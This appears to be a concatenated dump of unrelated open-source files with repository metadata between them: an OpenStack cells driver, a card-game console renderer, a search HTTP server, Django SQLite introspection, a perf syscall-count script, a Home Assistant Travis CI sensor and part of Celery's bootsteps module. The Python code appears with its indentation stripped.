# Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Base Cells Communication Driver
"""
class BaseCellsDriver(object):
"""The base class for cells communication.
One instance of this class will be created for every neighbor cell
that we find in the DB and it will be associated with the cell in
its CellState.
One instance is also created by the cells manager for setting up
the consumers.
"""
def start_servers(self, msg_runner):
"""Start any messaging servers the driver may need."""
raise NotImplementedError()
def stop_servers(self):
"""Stop accepting messages."""
raise NotImplementedError()
def send_message_to_cell(self, cell_state, message):
"""Send a message to a cell."""
raise NotImplementedError()
|
apache-2.0
|
jomyhuang/sdwle
|
SDWLE/ui/game_console.py
|
1
|
9331
|
from SDWLE.constants import CHARACTER_CLASS
card_abbreviations = {
'Mark of the Wild': 'Mrk Wild',
'Power of the Wild': 'Pow Wild',
'Wild Growth': 'Wld Grth',
'Healing Touch': 'Hlng Tch',
'Mark of Nature': 'Mrk Ntr',
'Savage Roar': 'Svg Roar',
'Soul of the Forest': 'Sol Frst',
'Force of Nature': 'Frce Nat',
'Keeper of the Grove': 'Kpr Grve',
'Druid of the Claw': 'Drd Claw',
'Stonetusk Boar': 'Stntsk Br',
'Raging Worgen': 'Rgng Wrgn',
}
def abbreviate(card_name):
return card_abbreviations.get(card_name, card_name)
def game_to_string(game):
pass
class console:
@classmethod
def log(self, message, source=None, color=0):
print(message)
class ConsoleGameRender:
def __init__(self, window, game, viewing_player):
if viewing_player is game.players[0]:
self.top_player = game.players[1]
self.bottom_player = game.players[0]
else:
self.top_player = game.players[0]
self.bottom_player = game.players[1]
# curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)
# curses.init_pair(2, curses.COLOR_GREEN, curses.COLOR_WHITE)
# curses.init_pair(3, curses.COLOR_WHITE, curses.COLOR_BLUE)
# curses.init_pair(4, curses.COLOR_BLACK, curses.COLOR_YELLOW)
# self.top_minion_window = window.derwin(3, 80, 4, 0)
# self.bottom_minion_window = window.derwin(3, 80, 8, 0)
# self.card_window = window.derwin(5, 80, 16, 0)
# self.card_window = window.derwin(5, 80, 16, 0)
self.top_minion_window = None
self.bottom_minion_window = None
self.card_window = None
self.card_window = None
self.window = window
self.game = game
self.targets = None
self.selected_target = None
self.selection_index = -1
self.lines = []
def console_printline(self):
for line in self.lines:
console.log(line)
def draw_minion(self, minion, window, y, x, main=True):
status_array = []
color = 0
if minion.can_attack():
status_array.append("*")
if not self.targets:
color = 2
else:
if not self.targets:
color = 1
if "attack" in minion.events:
status_array.append("a")
if "turn_start" in minion.events:
status_array.append("b")
if minion.charge:
status_array.append("c")
if minion.deathrattle is not None:
status_array.append("d")
if minion.enraged:
status_array.append("e")
if minion.frozen:
status_array.append("f")
if minion.immune:
status_array.append("i")
if minion.stealth:
status_array.append("s")
if minion.taunt:
status_array.append("t")
if minion.exhausted and not minion.charge:
status_array.append("z")
# if self.targets:
# if minion is self.selected_target:
# color = curses.color_pair(4)
# elif minion in self.targets:
# color = curses.color_pair(3)
name = abbreviate(minion.card.name)[:10]
status = ''.join(status_array)
power_line = "({0}) ({1})".format(minion.calculate_attack(), minion.health)
facedown = ''
if minion.card.is_facedown():
status = name
name = 'facedown'
#console(y, x, "{0}{1}:{2} {3:^9} {4:^9} {5:^9}".format(spaces, minion.index, facedown, name, power_line, status), color)
#console(y+1, x,"{0:^9}".format(power_line), color)
#console(y+2, x, "{0:^9}".format(status), color)
# window.addstr(y + 2, x, "{0}".format(minion.index), color
self.lines[0] += '[{0:^10}]'.format(name)
self.lines[1] += '[{0:^10}]'.format(power_line)
self.lines[2] += '[{0:^1} {1:^8}]'.format(minion.index, status[:8])
def draw_card(self, card, player, index, window, y, x):
color = 0
if card.can_use(player, player.game):
status = "*"
if not self.targets:
color = 2
else:
status = ' '
if not self.targets:
color = 1
if self.targets:
if card is self.selected_target:
color = 4
elif card in self.targets:
color = 3
name = card.name[:15]
#console(y + 0, x, "{0}:{1:>2} mana ({2}) {3:^15} ".format(index, card.mana_cost(), status, name), color)
# console(y + 1, x, "{0:^15}".format(name), color)
self.lines[0] += '+' + '-'*10 + '+'
self.lines[1] += '|{0:^10}|'.format(name[:10])
self.lines[2] += '|{0:^10}|'.format(status[:10])
self.lines[3] += '|{0:^10}|'.format(index)
def draw_hero(self, player, window, x, y):
# color = curses.color_pair(0)
# if self.targets:
# if player.hero is self.selected_target:
# color = curses.color_pair(4)
# elif player.hero in self.targets:
# color = curses.color_pair(3)
# if player.weapon is not None:
# weapon_power = "({0}) ({1})".format(player.weapon.base_attack, player.weapon.durability)
# window.addstr(y, x, "{0:^20}".format(player.weapon.card.name))
# window.addstr(y + 1, x, "{0:^20}".format(weapon_power))
#
# hero_power = "({0}) ({1}+{4}) -- {2}/{3}".format(player.hero.calculate_attack(), player.hero.health,
# player.mana, player.max_mana, player.hero.armor)
# window.addstr(y, x + 20, "{0:^20}".format(CHARACTER_CLASS.to_str(player.hero.character_class)), color)
# window.addstr(y + 1, x + 20, "{0:^20}".format(hero_power), color)
#
# window.addstr(y, x + 40, "{0:^20}".format("Hero Power"))
# if player.hero.power.can_use():
# window.addstr(y + 1, x + 40, "{0:^20}".format("*"))
pass
def draw_game(self):
# console(0,0,'draw_game Turn:{0}'.format(self.game._turns_passed))
# self.window.clear()
# self.bottom_minion_window.clear()
# self.top_minion_window.clear()
# self.card_window.clear()
def draw_minions(minions, window, main):
self.lines = ['','','','']
l_offset = int((80 - 10 * len(minions)) / 2)
index = 0
for minion in minions:
# if main and index == self.selection_index:
# window.addstr(2, l_offset + index * 10 - 1, "^")
self.draw_minion(minion, window, 0, l_offset + index * 10, main)
index += 1
# if main and len(minions) == self.selection_index:
# window.addstr(2, l_offset + index * 10 - 1, "^")
self.console_printline()
def draw_cards(cards, player, window, y):
self.lines = ['','','','']
l_offset = int((80 - 16 * len(cards)) / 2)
index = 0
for card in cards:
self.draw_card(card, player, index, window, y, l_offset + index * 16)
index += 1
if not index % 5:
self.console_printline()
self.lines = ['','','','']
if index % 5:
self.console_printline()
top_player_info = ''.join('deck:{0} hand:{1} base:{2} black-hole:{3}'.format(self.top_player.deck.left,
len(self.top_player.hand),
len(self.top_player.graveyard),
len(
self.top_player.graveyard_blackhole)))
console.log(top_player_info)
draw_minions(self.top_player.minions, self.top_minion_window, False)
draw_minions(self.bottom_player.minions, self.bottom_minion_window, True)
draw_cards(self.bottom_player.hand, self.bottom_player, self.card_window, 0)
player_info = ''.join('turn:{} player {} deck:{} base:{}, black-hole:{}'.format(self.game._turns_passed,
self.bottom_player.name,
self.bottom_player.deck.left,
len(self.bottom_player.graveyard),
len(self.bottom_player.graveyard_blackhole)))
console.log(player_info)
# draw_cards(self.bottom_player.hand[:5], self.bottom_player, self.card_window, 0)
# draw_cards(self.bottom_player.hand[5:], self.bottom_player, self.card_window, 3)
# self.draw_hero(self.top_player, self.window, 10, 0)
# self.draw_hero(self.bottom_player, self.window, 10, 12)
# self.window.refresh()
# self.bottom_minion_window.refresh()
# self.top_minion_window.refresh()
# self.card_window.refresh()
|
mit
|
bykoianko/omim
|
search/pysearch/run_search_server.py
|
11
|
2565
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
from __future__ import print_function
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
import argparse
import json
import os
import pysearch
import urlparse
DIR = os.path.dirname(__file__)
RESOURCE_PATH = os.path.realpath(os.path.join(DIR, '..', '..', 'data'))
MWM_PATH = os.path.realpath(os.path.join(DIR, '..', '..', 'data'))
PORT=8080
class HTTPHandler(BaseHTTPRequestHandler):
def do_GET(self):
result = urlparse.urlparse(self.path)
query = urlparse.parse_qs(result.query)
def sparam(name):
return query[name][-1]
def fparam(name):
return float(sparam(name))
params = pysearch.Params()
try:
params.query = sparam('query')
params.locale = sparam('locale')
params.position = pysearch.Mercator(fparam('posx'), fparam('posy'))
params.viewport = pysearch.Viewport(
pysearch.Mercator(fparam('minx'), fparam('miny')),
pysearch.Mercator(fparam('maxx'), fparam('maxy')))
except KeyError:
self.send_response(400)
return
results = HTTPHandler.engine.query(params)
responses = [{'name': result.name,
'address': result.address,
'has_center': result.has_center,
'center': {'x': result.center.x,
'y': result.center.y
}
}
for result in results]
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.end_headers()
json.dump(responses, self.wfile)
def main(args):
pysearch.init(args.r, args.m)
engine = pysearch.SearchEngine()
HTTPHandler.engine = pysearch.SearchEngine()
print('Starting HTTP server on port', PORT)
server = HTTPServer(('', args.p), HTTPHandler)
server.serve_forever()
if __name__ == '__main__':
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-r', metavar='RESOURCE_PATH', default=RESOURCE_PATH,
help='Path to resources directory.')
parser.add_argument('-m', metavar='MWM_PATH', default=MWM_PATH,
help='Path to mwm files.')
parser.add_argument('-p', metavar='PORT', default=PORT,
help='Port for the server to listen')
args = parser.parse_args()
main(args)
|
apache-2.0
|
piquadrat/django
|
django/db/backends/sqlite3/introspection.py
|
7
|
11272
|
import re
from django.db.backends.base.introspection import (
BaseDatabaseIntrospection, FieldInfo, TableInfo,
)
from django.db.models.indexes import Index
field_size_re = re.compile(r'^\s*(?:var)?char\s*\(\s*(\d+)\s*\)\s*$')
def get_field_size(name):
""" Extract the size number from a "varchar(11)" type name """
m = field_size_re.search(name)
return int(m.group(1)) if m else None
# This light wrapper "fakes" a dictionary interface, because some SQLite data
# types include variables in them -- e.g. "varchar(30)" -- and can't be matched
# as a simple dictionary lookup.
class FlexibleFieldLookupDict:
# Maps SQL types to Django Field types. Some of the SQL types have multiple
# entries here because SQLite allows for anything and doesn't normalize the
# field type; it uses whatever was given.
base_data_types_reverse = {
'bool': 'BooleanField',
'boolean': 'BooleanField',
'smallint': 'SmallIntegerField',
'smallint unsigned': 'PositiveSmallIntegerField',
'smallinteger': 'SmallIntegerField',
'int': 'IntegerField',
'integer': 'IntegerField',
'bigint': 'BigIntegerField',
'integer unsigned': 'PositiveIntegerField',
'decimal': 'DecimalField',
'real': 'FloatField',
'text': 'TextField',
'char': 'CharField',
'blob': 'BinaryField',
'date': 'DateField',
'datetime': 'DateTimeField',
'time': 'TimeField',
}
def __getitem__(self, key):
key = key.lower()
try:
return self.base_data_types_reverse[key]
except KeyError:
size = get_field_size(key)
if size is not None:
return ('CharField', {'max_length': size})
raise KeyError
class DatabaseIntrospection(BaseDatabaseIntrospection):
data_types_reverse = FlexibleFieldLookupDict()
def get_table_list(self, cursor):
"""Return a list of table and view names in the current database."""
# Skip the sqlite_sequence system table used for autoincrement key
# generation.
cursor.execute("""
SELECT name, type FROM sqlite_master
WHERE type in ('table', 'view') AND NOT name='sqlite_sequence'
ORDER BY name""")
return [TableInfo(row[0], row[1][0]) for row in cursor.fetchall()]
def get_table_description(self, cursor, table_name):
"""
Return a description of the table with the DB-API cursor.description
interface.
"""
return [
FieldInfo(
info['name'],
info['type'],
None,
info['size'],
None,
None,
info['null_ok'],
info['default'],
) for info in self._table_info(cursor, table_name)
]
def get_sequences(self, cursor, table_name, table_fields=()):
pk_col = self.get_primary_key_column(cursor, table_name)
return [{'table': table_name, 'column': pk_col}]
def get_relations(self, cursor, table_name):
"""
Return a dictionary of {field_name: (field_name_other_table, other_table)}
representing all relationships to the given table.
"""
# Dictionary of relations to return
relations = {}
# Schema for this table
cursor.execute("SELECT sql FROM sqlite_master WHERE tbl_name = %s AND type = %s", [table_name, "table"])
try:
results = cursor.fetchone()[0].strip()
except TypeError:
# It might be a view, then no results will be returned
return relations
results = results[results.index('(') + 1:results.rindex(')')]
# Walk through and look for references to other tables. SQLite doesn't
# really have enforced references, but since it echoes out the SQL used
# to create the table we can look for REFERENCES statements used there.
for field_desc in results.split(','):
field_desc = field_desc.strip()
if field_desc.startswith("UNIQUE"):
continue
m = re.search(r'references (\S*) ?\(["|]?(.*)["|]?\)', field_desc, re.I)
if not m:
continue
table, column = [s.strip('"') for s in m.groups()]
if field_desc.startswith("FOREIGN KEY"):
# Find name of the target FK field
m = re.match(r'FOREIGN KEY\s*\(([^\)]*)\).*', field_desc, re.I)
field_name = m.groups()[0].strip('"')
else:
field_name = field_desc.split()[0].strip('"')
cursor.execute("SELECT sql FROM sqlite_master WHERE tbl_name = %s", [table])
result = cursor.fetchall()[0]
other_table_results = result[0].strip()
li, ri = other_table_results.index('('), other_table_results.rindex(')')
other_table_results = other_table_results[li + 1:ri]
for other_desc in other_table_results.split(','):
other_desc = other_desc.strip()
if other_desc.startswith('UNIQUE'):
continue
other_name = other_desc.split(' ', 1)[0].strip('"')
if other_name == column:
relations[field_name] = (other_name, table)
break
return relations
def get_key_columns(self, cursor, table_name):
"""
Return a list of (column_name, referenced_table_name, referenced_column_name)
for all key columns in given table.
"""
key_columns = []
# Schema for this table
cursor.execute("SELECT sql FROM sqlite_master WHERE tbl_name = %s AND type = %s", [table_name, "table"])
results = cursor.fetchone()[0].strip()
results = results[results.index('(') + 1:results.rindex(')')]
# Walk through and look for references to other tables. SQLite doesn't
# really have enforced references, but since it echoes out the SQL used
# to create the table we can look for REFERENCES statements used there.
for field_index, field_desc in enumerate(results.split(',')):
field_desc = field_desc.strip()
if field_desc.startswith("UNIQUE"):
continue
m = re.search(r'"(.*)".*references (.*) \(["|](.*)["|]\)', field_desc, re.I)
if not m:
continue
# This will append (column_name, referenced_table_name, referenced_column_name) to key_columns
key_columns.append(tuple(s.strip('"') for s in m.groups()))
return key_columns
def get_primary_key_column(self, cursor, table_name):
"""Return the column name of the primary key for the given table."""
# Don't use PRAGMA because that causes issues with some transactions
cursor.execute("SELECT sql FROM sqlite_master WHERE tbl_name = %s AND type = %s", [table_name, "table"])
row = cursor.fetchone()
if row is None:
raise ValueError("Table %s does not exist" % table_name)
results = row[0].strip()
results = results[results.index('(') + 1:results.rindex(')')]
for field_desc in results.split(','):
field_desc = field_desc.strip()
m = re.search('"(.*)".*PRIMARY KEY( AUTOINCREMENT)?', field_desc)
if m:
return m.groups()[0]
return None
def _table_info(self, cursor, name):
cursor.execute('PRAGMA table_info(%s)' % self.connection.ops.quote_name(name))
# cid, name, type, notnull, default_value, pk
return [{
'name': field[1],
'type': field[2],
'size': get_field_size(field[2]),
'null_ok': not field[3],
'default': field[4],
'pk': field[5], # undocumented
} for field in cursor.fetchall()]
def get_constraints(self, cursor, table_name):
"""
Retrieve any constraints or keys (unique, pk, fk, check, index) across
one or more columns.
"""
constraints = {}
# Get the index info
cursor.execute("PRAGMA index_list(%s)" % self.connection.ops.quote_name(table_name))
for row in cursor.fetchall():
# Sqlite3 3.8.9+ has 5 columns, however older versions only give 3
# columns. Discard last 2 columns if there.
number, index, unique = row[:3]
# Get the index info for that index
cursor.execute('PRAGMA index_info(%s)' % self.connection.ops.quote_name(index))
for index_rank, column_rank, column in cursor.fetchall():
if index not in constraints:
constraints[index] = {
"columns": [],
"primary_key": False,
"unique": bool(unique),
"foreign_key": False,
"check": False,
"index": True,
}
constraints[index]['columns'].append(column)
# Add type and column orders for indexes
if constraints[index]['index'] and not constraints[index]['unique']:
# SQLite doesn't support any index type other than b-tree
constraints[index]['type'] = Index.suffix
cursor.execute(
"SELECT sql FROM sqlite_master "
"WHERE type='index' AND name=%s" % self.connection.ops.quote_name(index)
)
orders = []
# There would be only 1 row to loop over
for sql, in cursor.fetchall():
order_info = sql.split('(')[-1].split(')')[0].split(',')
orders = ['DESC' if info.endswith('DESC') else 'ASC' for info in order_info]
constraints[index]['orders'] = orders
# Get the PK
pk_column = self.get_primary_key_column(cursor, table_name)
if pk_column:
# SQLite doesn't actually give a name to the PK constraint,
# so we invent one. This is fine, as the SQLite backend never
# deletes PK constraints by name, as you can't delete constraints
# in SQLite; we remake the table with a new PK instead.
constraints["__primary__"] = {
"columns": [pk_column],
"primary_key": True,
"unique": False, # It's not actually a unique constraint.
"foreign_key": False,
"check": False,
"index": False,
}
# Get foreign keys
cursor.execute('PRAGMA foreign_key_list(%s)' % self.connection.ops.quote_name(table_name))
for row in cursor.fetchall():
# Remaining on_update/on_delete/match values are of no interest here
id_, seq, table, from_, to = row[:5]
constraints['fk_%d' % id_] = {
'columns': [from_],
'primary_key': False,
'unique': False,
'foreign_key': (table, to),
'check': False,
'index': False,
}
return constraints
|
bsd-3-clause
|
alma-siwon/Solid_Kernel-GPROJ
|
tools/perf/scripts/python/syscall-counts.py
|
11181
|
1522
|
# system call counts
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import syscall_name
usage = "perf script -s syscall-counts.py [comm]\n";
for_comm = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
print "%-40s %10d\n" % (syscall_name(id), val),
|
gpl-2.0
|
balloob/home-assistant
|
homeassistant/components/travisci/sensor.py
|
13
|
5424
|
"""This component provides HA sensor support for Travis CI framework."""
from datetime import timedelta
import logging
from travispy import TravisPy
from travispy.errors import TravisError
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
ATTR_ATTRIBUTION,
CONF_API_KEY,
CONF_MONITORED_CONDITIONS,
CONF_SCAN_INTERVAL,
TIME_SECONDS,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
ATTRIBUTION = "Information provided by https://travis-ci.org/"
CONF_BRANCH = "branch"
CONF_REPOSITORY = "repository"
DEFAULT_BRANCH_NAME = "master"
SCAN_INTERVAL = timedelta(seconds=30)
# sensor_type [ description, unit, icon ]
SENSOR_TYPES = {
"last_build_id": ["Last Build ID", "", "mdi:card-account-details"],
"last_build_duration": ["Last Build Duration", TIME_SECONDS, "mdi:timelapse"],
"last_build_finished_at": ["Last Build Finished At", "", "mdi:timetable"],
"last_build_started_at": ["Last Build Started At", "", "mdi:timetable"],
"last_build_state": ["Last Build State", "", "mdi:github"],
"state": ["State", "", "mdi:github"],
}
NOTIFICATION_ID = "travisci"
NOTIFICATION_TITLE = "Travis CI Sensor Setup"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_API_KEY): cv.string,
vol.Required(CONF_MONITORED_CONDITIONS, default=list(SENSOR_TYPES)): vol.All(
cv.ensure_list, [vol.In(SENSOR_TYPES)]
),
vol.Required(CONF_BRANCH, default=DEFAULT_BRANCH_NAME): cv.string,
vol.Optional(CONF_REPOSITORY, default=[]): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_SCAN_INTERVAL, default=SCAN_INTERVAL): cv.time_period,
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Travis CI sensor."""
token = config.get(CONF_API_KEY)
repositories = config.get(CONF_REPOSITORY)
branch = config.get(CONF_BRANCH)
try:
travis = TravisPy.github_auth(token)
user = travis.user()
except TravisError as ex:
_LOGGER.error("Unable to connect to Travis CI service: %s", str(ex))
hass.components.persistent_notification.create(
"Error: {}<br />"
"You will need to restart hass after fixing."
"".format(ex),
title=NOTIFICATION_TITLE,
notification_id=NOTIFICATION_ID,
)
return False
sensors = []
# non specific repository selected, then show all associated
if not repositories:
all_repos = travis.repos(member=user.login)
repositories = [repo.slug for repo in all_repos]
for repo in repositories:
if "/" not in repo:
repo = f"{user.login}/{repo}"
for sensor_type in config.get(CONF_MONITORED_CONDITIONS):
sensors.append(TravisCISensor(travis, repo, user, branch, sensor_type))
add_entities(sensors, True)
return True
class TravisCISensor(Entity):
"""Representation of a Travis CI sensor."""
def __init__(self, data, repo_name, user, branch, sensor_type):
"""Initialize the sensor."""
self._build = None
self._sensor_type = sensor_type
self._data = data
self._repo_name = repo_name
self._user = user
self._branch = branch
self._state = None
self._name = "{} {}".format(self._repo_name, SENSOR_TYPES[self._sensor_type][0])
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return SENSOR_TYPES[self._sensor_type][1]
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def device_state_attributes(self):
"""Return the state attributes."""
attrs = {}
attrs[ATTR_ATTRIBUTION] = ATTRIBUTION
if self._build and self._state is not None:
if self._user and self._sensor_type == "state":
attrs["Owner Name"] = self._user.name
attrs["Owner Email"] = self._user.email
else:
attrs["Committer Name"] = self._build.commit.committer_name
attrs["Committer Email"] = self._build.commit.committer_email
attrs["Commit Branch"] = self._build.commit.branch
attrs["Committed Date"] = self._build.commit.committed_at
attrs["Commit SHA"] = self._build.commit.sha
return attrs
@property
def icon(self):
"""Return the icon to use in the frontend, if any."""
return SENSOR_TYPES[self._sensor_type][2]
def update(self):
"""Get the latest data and updates the states."""
_LOGGER.debug("Updating sensor %s", self._name)
repo = self._data.repo(self._repo_name)
self._build = self._data.build(repo.last_build_id)
if self._build:
if self._sensor_type == "state":
branch_stats = self._data.branch(self._branch, self._repo_name)
self._state = branch_stats.state
else:
param = self._sensor_type.replace("last_build_", "")
self._state = getattr(self._build, param)
|
apache-2.0
|
kawamon/hue
|
desktop/core/ext-py/celery-4.2.1/celery/bootsteps.py
|
2
|
12545
|
# -*- coding: utf-8 -*-
"""A directed acyclic graph of reusable components."""
from __future__ import absolute_import, unicode_literals
from collections import deque
from threading import Event
from kombu.common import ignore_errors
from kombu.utils.encoding import bytes_to_str
from kombu.utils.imports import symbol_by_name
from .five import bytes_if_py2, values, with_metaclass
from .utils.graph import DependencyGraph, GraphFormatter
from .utils.imports import instantiate, qualname
from .utils.log import get_logger
try:
from greenlet import GreenletExit
except ImportError: # pragma: no cover
IGNORE_ERRORS = ()
else:
IGNORE_ERRORS = (GreenletExit,)
__all__ = ('Blueprint', 'Step', 'StartStopStep', 'ConsumerStep')
#: States
RUN = 0x1
CLOSE = 0x2
TERMINATE = 0x3
logger = get_logger(__name__)
def _pre(ns, fmt):
return '| {0}: {1}'.format(ns.alias, fmt)
def _label(s):
return s.name.rsplit('.', 1)[-1]
class StepFormatter(GraphFormatter):
"""Graph formatter for :class:`Blueprint`."""
blueprint_prefix = '⧉'
conditional_prefix = '∘'
blueprint_scheme = {
'shape': 'parallelogram',
'color': 'slategray4',
'fillcolor': 'slategray3',
}
def label(self, step):
return step and '{0}{1}'.format(
self._get_prefix(step),
bytes_to_str(
(step.label or _label(step)).encode('utf-8', 'ignore')),
)
def _get_prefix(self, step):
if step.last:
return self.blueprint_prefix
if step.conditional:
return self.conditional_prefix
return ''
def node(self, obj, **attrs):
scheme = self.blueprint_scheme if obj.last else self.node_scheme
return self.draw_node(obj, scheme, attrs)
def edge(self, a, b, **attrs):
if a.last:
attrs.update(arrowhead='none', color='darkseagreen3')
return self.draw_edge(a, b, self.edge_scheme, attrs)
class Blueprint(object):
"""Blueprint containing bootsteps that can be applied to objects.
Arguments:
steps Sequence[Union[str, Step]]: List of steps.
name (str): Set explicit name for this blueprint.
on_start (Callable): Optional callback applied after blueprint start.
on_close (Callable): Optional callback applied before blueprint close.
on_stopped (Callable): Optional callback applied after
blueprint stopped.
"""
GraphFormatter = StepFormatter
name = None
state = None
started = 0
default_steps = set()
state_to_name = {
0: 'initializing',
RUN: 'running',
CLOSE: 'closing',
TERMINATE: 'terminating',
}
def __init__(self, steps=None, name=None,
on_start=None, on_close=None, on_stopped=None):
self.name = name or self.name or qualname(type(self))
self.types = set(steps or []) | set(self.default_steps)
self.on_start = on_start
self.on_close = on_close
self.on_stopped = on_stopped
self.shutdown_complete = Event()
self.steps = {}
def start(self, parent):
self.state = RUN
if self.on_start:
self.on_start()
for i, step in enumerate(s for s in parent.steps if s is not None):
self._debug('Starting %s', step.alias)
self.started = i + 1
step.start(parent)
logger.debug('^-- substep ok')
def human_state(self):
return self.state_to_name[self.state or 0]
def info(self, parent):
info = {}
for step in parent.steps:
info.update(step.info(parent) or {})
return info
def close(self, parent):
if self.on_close:
self.on_close()
self.send_all(parent, 'close', 'closing', reverse=False)
def restart(self, parent, method='stop',
description='restarting', propagate=False):
self.send_all(parent, method, description, propagate=propagate)
def send_all(self, parent, method,
description=None, reverse=True, propagate=True, args=()):
description = description or method.replace('_', ' ')
steps = reversed(parent.steps) if reverse else parent.steps
for step in steps:
if step:
fun = getattr(step, method, None)
if fun is not None:
self._debug('%s %s...',
description.capitalize(), step.alias)
try:
fun(parent, *args)
except Exception as exc: # pylint: disable=broad-except
if propagate:
raise
logger.exception(
'Error on %s %s: %r', description, step.alias, exc)
def stop(self, parent, close=True, terminate=False):
what = 'terminating' if terminate else 'stopping'
if self.state in (CLOSE, TERMINATE):
return
if self.state != RUN or self.started != len(parent.steps):
# Not fully started, can safely exit.
self.state = TERMINATE
self.shutdown_complete.set()
return
self.close(parent)
self.state = CLOSE
self.restart(
parent, 'terminate' if terminate else 'stop',
description=what, propagate=False,
)
if self.on_stopped:
self.on_stopped()
self.state = TERMINATE
self.shutdown_complete.set()
def join(self, timeout=None):
try:
# Will only get here if running green,
# makes sure all greenthreads have exited.
self.shutdown_complete.wait(timeout=timeout)
except IGNORE_ERRORS:
pass
def apply(self, parent, **kwargs):
"""Apply the steps in this blueprint to an object.
This will apply the ``__init__`` and ``include`` methods
of each step, with the object as argument::
step = Step(obj)
...
step.include(obj)
For :class:`StartStopStep` the services created
will also be added to the objects ``steps`` attribute.
"""
self._debug('Preparing bootsteps.')
order = self.order = []
steps = self.steps = self.claim_steps()
self._debug('Building graph...')
for S in self._finalize_steps(steps):
step = S(parent, **kwargs)
steps[step.name] = step
order.append(step)
self._debug('New boot order: {%s}',
', '.join(s.alias for s in self.order))
for step in order:
step.include(parent)
return self
def connect_with(self, other):
self.graph.adjacent.update(other.graph.adjacent)
self.graph.add_edge(type(other.order[0]), type(self.order[-1]))
def __getitem__(self, name):
return self.steps[name]
def _find_last(self):
return next((C for C in values(self.steps) if C.last), None)
def _firstpass(self, steps):
for step in values(steps):
step.requires = [symbol_by_name(dep) for dep in step.requires]
stream = deque(step.requires for step in values(steps))
while stream:
for node in stream.popleft():
node = symbol_by_name(node)
if node.name not in self.steps:
steps[node.name] = node
stream.append(node.requires)
def _finalize_steps(self, steps):
last = self._find_last()
self._firstpass(steps)
it = ((C, C.requires) for C in values(steps))
G = self.graph = DependencyGraph(
it, formatter=self.GraphFormatter(root=last),
)
if last:
for obj in G:
if obj != last:
G.add_edge(last, obj)
try:
return G.topsort()
except KeyError as exc:
raise KeyError('unknown bootstep: %s' % exc)
def claim_steps(self):
return dict(self.load_step(step) for step in self.types)
def load_step(self, step):
step = symbol_by_name(step)
return step.name, step
def _debug(self, msg, *args):
return logger.debug(_pre(self, msg), *args)
@property
def alias(self):
return _label(self)
class StepType(type):
"""Meta-class for steps."""
name = None
requires = None
def __new__(cls, name, bases, attrs):
module = attrs.get('__module__')
qname = '{0}.{1}'.format(module, name) if module else name
attrs.update(
__qualname__=qname,
name=attrs.get('name') or qname,
)
return super(StepType, cls).__new__(cls, name, bases, attrs)
def __str__(self):
return bytes_if_py2(self.name)
def __repr__(self):
return bytes_if_py2('step:{0.name}{{{0.requires!r}}}'.format(self))
@with_metaclass(StepType)
class Step(object):
"""A Bootstep.
The :meth:`__init__` method is called when the step
is bound to a parent object, and can as such be used
to initialize attributes in the parent object at
parent instantiation-time.
"""
#: Optional step name, will use ``qualname`` if not specified.
name = None
#: Optional short name used for graph outputs and in logs.
label = None
#: Set this to true if the step is enabled based on some condition.
conditional = False
#: List of other steps that that must be started before this step.
#: Note that all dependencies must be in the same blueprint.
requires = ()
#: This flag is reserved for the workers Consumer,
#: since it is required to always be started last.
#: There can only be one object marked last
#: in every blueprint.
last = False
#: This provides the default for :meth:`include_if`.
enabled = True
def __init__(self, parent, **kwargs):
pass
def include_if(self, parent):
"""Return true if bootstep should be included.
You can define this as an optional predicate that decides whether
this step should be created.
"""
return self.enabled
def instantiate(self, name, *args, **kwargs):
return instantiate(name, *args, **kwargs)
def _should_include(self, parent):
if self.include_if(parent):
return True, self.create(parent)
return False, None
def include(self, parent):
return self._should_include(parent)[0]
def create(self, parent):
"""Create the step."""
def __repr__(self):
return bytes_if_py2('<step: {0.alias}>'.format(self))
@property
def alias(self):
return self.label or _label(self)
def info(self, obj):
pass
class StartStopStep(Step):
"""Bootstep that must be started and stopped in order."""
#: Optional obj created by the :meth:`create` method.
#: This is used by :class:`StartStopStep` to keep the
#: original service object.
obj = None
def start(self, parent):
if self.obj:
return self.obj.start()
def stop(self, parent):
if self.obj:
return self.obj.stop()
def close(self, parent):
pass
def terminate(self, parent):
if self.obj:
